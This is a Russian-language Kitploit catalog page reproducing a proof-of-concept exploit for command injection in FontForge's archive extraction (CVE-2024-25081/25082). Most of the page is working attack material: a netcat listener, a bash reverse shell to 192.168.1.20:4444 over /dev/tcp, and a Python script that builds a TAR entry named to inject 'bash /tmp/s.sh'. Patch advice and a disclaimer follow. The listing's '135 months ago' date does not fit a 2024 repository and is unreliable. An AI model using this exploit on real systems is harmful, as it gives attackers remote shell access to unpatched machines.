Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/alielkhatteb/cve-2024-25082_cve-2024-25081
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubalielkhatteb/cve-2024-25082_cve-2024-25081

CVE-2024-25082_CVE-2024-25081

Уязвимость внедрения команд в FontForge Splinefont через специально сформированное имя файла

Репозиторий
135 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

⚠️ FontForge RCE — CVE-2024-25081 и CVE-2024-25082 - PoC

📖 Обзор

Эксплойт типа proof-of-concept для двух уязвимостей внедрения команд в FontForge ≤ 20230101 (компонент Splinefont).

CVEВекторТриггер
CVE-2024-25081Сформированное имя файлаПрямое открытие файла
CVE-2024-25082Сформированное имя файла в архивеИзвлечение TAR/ZIP/GZ/BZ2

Этот PoC нацелен на CVE-2024-25082 — автоматическое извлечение архивов FontForge передаёт имена файлов в оболочку без санитизации, что позволяет выполнить произвольные команды с помощью точки с запятой, встроенной в имя записи TAR.


Как это работает

FontForge поддерживает открытие файлов шрифтов непосредственно из архивов. При извлечении архива TAR компонент Splinefont формирует команду оболочки, используя имя файла из записи архива. Поскольку имя файла не санитизируется, точка с запятой (;) в имени записи вырывается из ожидаемой команды и внедряет произвольные инструкции оболочки.

Имя вредоносной записи TAR:

root@kitploit:~
exploit.ttf;bash /tmp/s.sh;

Когда FontForge обрабатывает этот архив, оболочка интерпретирует это как:

root@kitploit:~
<extract command> exploit.ttf ; bash /tmp/s.sh ; 

Окружение

  • Уязвимое ПО: FontForge ≤ 20230101
  • Платформа: Linux
  • Слушатель атакующего: 192.168.1.20:4444 (при необходимости измените)

📋 Предварительные требования

  • Python 3 (только стандартная библиотека, модуль tarfile)
  • netcat на машине атакующего
  • FontForge ≤ 20230101 на целевой машине

🛠️ Доказательство концепции

1. Запустите слушатель netcat на машине атакующего

root@kitploit:~
nc -lvnp 4444

2. Создайте вредоносный архив TAR

root@kitploit:~
# Write the reverse shell payload
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh

# Build the malicious archive
python3 << 'EOF'
import tarfile, io

malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF

3. Откройте архив в FontForge на целевой машине

root@kitploit:~
fontforge exploit.tar

Обратная оболочка подключится к вашему слушателю.


🔒 Патч

Исправлено в FontForge после версии 20230101 через PR #5367. Обновитесь до последнего релиза.

  • Debian/Ubuntu: sudo apt upgrade fontforge
  • Ручная сборка: возьмите последнюю версию из fontforge/fontforge

🔍 Ссылки

  • NVD — CVE-2024-25081
  • NVD — CVE-2024-25082
  • FontForge fix PR #5367

⚖️ Отказ от ответственности и условия

Этот код доказательства концепции (PoC) предоставляется только для образовательных целей и авторизованного тестирования на проникновение.

  • Не даётся разрешения на модификацию, распространение или использование этого кода для любых других целей.
  • Несанкционированное использование или модификация может быть незаконной и неэтичной.
  • Авторы не несут ответственности за любое неправомерное использование или ущерб.
Скачать инструмент